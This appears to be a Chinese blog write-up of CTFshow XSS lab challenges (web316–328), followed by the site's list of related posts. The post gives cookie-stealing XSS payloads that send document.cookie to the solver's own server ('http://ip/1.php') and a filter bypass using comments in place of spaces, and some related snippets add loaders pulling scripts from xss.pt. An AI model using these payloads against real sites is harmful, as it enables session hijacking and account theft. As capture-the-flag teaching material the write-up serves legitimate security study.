CTFSHOW-XSS

最新推荐文章于 2024-07-03 16:24:19 发布
最新推荐文章于 2024-07-03 16:24:19 发布
阅读量256 收藏
点赞数
文章标签: xss php 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/129467771
版权
文章描述了一种XSS攻击的系列案例,从利用`<script>`标签到`onload`事件,以及如何绕过空格过滤。攻击者尝试将受害者的cookie发送到自定义web服务,从反射型XSS过渡到存储型XSS,目标是获取管理员的cookie信息。
摘要由CSDN通过智能技术生成

先给一个XSS平台:XSS平台 - (支持http/https)XSS Platform

web316

先在自己的服务器上开启一个web服务,用来接收flag

<?php
$content = $_GET[1];
if(isset($content)){
file_put_content('./flag.txt',$content);
}else{
echo 'no no no';
}

目的:拿到管理员的cookie

payload:

<script>document.location.href='http://ip/1.php?1='+document.cookie</script>

web317

上面的payload不能用了

payload:

<body onload="document.location.href='http://ip/1.php?1='+document.cookie"</body>

web318

payload同上

web319

payload同上

web320

过滤了空格

payload:

<body/**/onload="document.location.href='http://ip/1.php?1='+document.cookie"</body>

web321

payload同上

web322

payload同上

web323

payload同上

web324

payload同上

web325

payload同上

web326

payload同上.

web327

前面都是反射型,这题开始是存储型

payload还是上面的,写在信的内容处,同时注意收件人是admin

web328

我们先注册一个账号,如果为admin提示不可注册,我们注册一个admin1

密码就是

然后登录

超级兵_140
关注
CTFshow XSS(web316-333)
Kradress的博客
03-18 795
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
2024年CTFSHOW-Web入门题解(更新中)
2401_84252743的博客
05-01 579
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow XSS
qq_45951598的博客
10-07 263
收集一下可用的姿势吧, window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。 location.href=”/url” 当前页面打开URL页面 windows.location.href=”/url” 当前页面打开URL页面 onfocus 事件在对象获得焦点时发生 autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。 <script>window.open('http://ip:端口/'+document.cookie)</
ctfshowXSS
njh18790816639的博客
05-19 352
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
CTFShow Xss
paidx0
08-12 1459
CTFShow Xss(学习) 简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export xss 分类:(三类) 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
CTFSHOW-Web入门题解(更新中)
2401_84297944的博客
04-28 301
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。根据提示,我们禁用js。这里可以使用插件,javascript switch。以下题目均需要使用xss平台获取Cookie,这里为了学习演示只弹窗。script标签好像被过滤了,用img。提示js前台拦截 === 无效操作。过滤了img和script。因篇幅有限,仅展示部分资料。F12查看源代码即可。
-------已搬运------CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----
Zero_Adam的博客
04-29 806
目录:web0_签到_观己一、自己做:二、学到的&&不足:web1_观宇一、自己做:二、学到的:三、学习WP:web2_观星00000+一、自己做:三、看WP: web0_签到_观己 一、自己做: 吐槽一句,ctfshow 的题就是 考知识点!! ,一点拖泥带水的。赞一个!!! <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d
CTFshow——XSS
D.MIND 的博客
04-01 632
文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格 web316 利用xss平台里的代码进行攻击: https://xss.pt/xss.php <sCRiPt sRC=//xss.pt/kUIB></sCrIpT> web317——过滤了script <img src=x onerror=s=createElement('script');body.appendChild(s);s.sr
ctfshow——XSS
qq_55202378的博客
04-24 1305
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。
ctfshow—XSS
cosmoslin的博客
02-05 1000
web 316(反射型) 测试<script>alert(1)</script>,无过滤 在服务器上开启监听 python3 -m http.server 39543 外带数据: <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx.xx:39543/"+docu
CTFSHOW xss
羽的博客
12-28 9407
web316 xss平台 https://xss.pt/xss.php 创建项目 选择默认模块 一直下一步,然后随便那个代码放到题目输入框中 再刷新下题目 最后看下项目 结束
ctfshow-xss(web316-web330)
最新发布
m0_72125469的博客
07-03 1367
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
ctfshow之xss(有图易操作)
qq_50589021的博客
08-14 697
XSS平台 document.cookie 获取饼干的js代码 推荐xss平台:http://xsscom.com/ , https://xss.pt/ JavaScript的 document.cookie 将以字符串的方式返回所有的cookie,类型格式: cookie1=value; cookie2=value; cookie3=value; 2021-08-06 web316(反射型) 利用xss平台里的代码进行攻击: http://xsscom.com/ 建造完项目以后,复制代码: <sc
ctfshow XSS专题
yink12138的博客
12-17 1543
ctfshow XSS专题
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 2111
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值